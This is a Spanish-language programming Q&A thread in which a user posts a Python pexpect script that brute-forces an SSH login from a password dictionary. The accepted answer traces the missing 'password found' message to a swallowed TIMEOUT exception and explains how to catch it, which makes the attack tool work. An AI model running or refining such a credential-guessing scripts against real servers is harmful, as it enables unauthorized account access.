# fuerza bruta SSH (Python)

Tags: python, ssh

Estoy creando un script de fuerza bruta para servidor ssh, pero tengo un problema con la respuesta al momento de encontrar la contraseña.

```
#!/usr/bin/python

import os, pexpect

prompt = ["# ", ">>>", "> ", "\$ ", "[W|w]elcome", "[P|p]ress"]

def connecting(user, host, password):
    ssh_newkey = "Are you sure you want to continue connecting"
    conn = "ssh " + user + "@" + host
    child = pexpect.spawn(conn)
    respuesta = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword:'])
    print(respuesta)
    if respuesta == 0:
        print ("[-] Error connecting.")
        child.close()
    elif respuesta == 1:
            child.sendline("yes")
            respuesta = child.expect[(pexpect.TIMEOUT, '[P|p]assword: ')]
            if respuesta == 0:
                print ("[-] Error connecting.")
                return
    child.sendline(password)
    resp = child.expect(["[P|p]ermission denied", "[P|p]lease press", "# ", ">>>", "> ", "/$ "], timeout=0.5)
    print(resp)
    if resp == 0:
        pass
    else:
        print("[+] Password found: " + password)
        exit()
    return child

def main():
    global path
    host = "XXX"
    user = "XXX"
    path = raw_input("[+] Enter dictionary path: ")
    try:
        file = open((path), "r")
        for password in file.readlines():
            password = password.strip('\n')
            try:
                connecting(user, host, password)
            except:
                pass
    except:
        print("[-] Path doesn't exists.")
        exit()



main()
```

El problema sé que redica en esta parte:

```
child.sendline(password)
resp = child.expect(["[P|p]ermission denied", "[P|p]lease press", "# ", ">>>", "> ", "/$ "], timeout=0.5)
print(resp)
if resp == 0:
    pass
else:
    print("[+] Password found: " + password)
    exit()
return child
```

En el momento en que lograr ingresar a la cuenta no hay respuesta, este es el resultado:

```
xxx@xxx:~/Documents/python_proyects/bruteforce$ ./bruteforce2.py
[+] Enter dictionary path: /home/xxx/Documents/pass.txt
2
0
2
0
2
2
0
2
0
2
0
xxx@xxx:~/Documents/python_proyects/bruteforce$
```

2 equivale a que obtuvo como respuesta que debe ingresar la contraseña para probar y 0 equivale a que denegado el acceso, pero si se dan cuenta cuando ingresa la tercera contraseña (que es la correcta) no envia respuesta.
Cómo logro que imprima una respuesta para cuando dé con la contraseña?

SAludos!!

Answer (score 4, accepted):

Probablemente se está produciendo una excepción que estás ignorando debido a tu `except: pass`.

La excepción probablemente sea de Timeout, ya que en tu llamada a `expect()` especificas un tiempo máximo de espera de 0.5 segundos y quizás cuando aciertas la contraseña, el servidor hace más cosas para loguearte, y la respuesta tarda más de 0.5 en llegar. En este caso, según la documentación de `pexpect`, se producirá la excepción `TIMEOUT`.

Lo de `except: pass` es un antipatrón. No debe usarse nunca, pues oculta *cualquier* excepción que pueda producirse en el programa. Especialmente durante la fase de desarrollo no quieres ocultar los errores, sino descubrirlos para corregirlos.

O bien dejas las excepciones sin capturar (lo que producirá que tu programa "rompa" en tiempo de ejecución mostrando el *stacktrace* por pantalla, lo que puede no ser muy bonito, pero al menos te permite saber qué está pasando), o bien capturas la excepción y emites algún mensaje al respecto. Y lo ideal es capturar sólo la excepción que esperas que se produzca (en lugar de "cualquier excepción") y dejar sin capturar las otras, para que si se producen al menos te enteres.

Es decir, yo cambiaría el:

```py
            try:
                connecting(user, host, password)
            except:
                pass
```

por

```py
            try:
                connecting(user, host, password)
            except pexpect.TIMEOUT:
                print("[-] Timeout exception")
```

Si se produce la excepción `TIMEOUT` (y solo esa), el programa puede continuar, pero al menos emite un mensaje que te permite enterarte de que ha ocurrido. Y si se produce *cualquier otra*, al no estar capturada, el programa "romperá" y te mostrará qué excepción se produjo. Si te ocurre esto, deberás averiguar por qué se produjo esa otra excepción y decidir si es un bug de tu código (y corregirlo), o un caso que también quieres ignorar (para añadir otro bloque `except` con otro mensaje)

Comment: Muchas gracias, me ha sido de mucha utilidad tu respuesta. El problema si estaba en el timeout. Saludos!!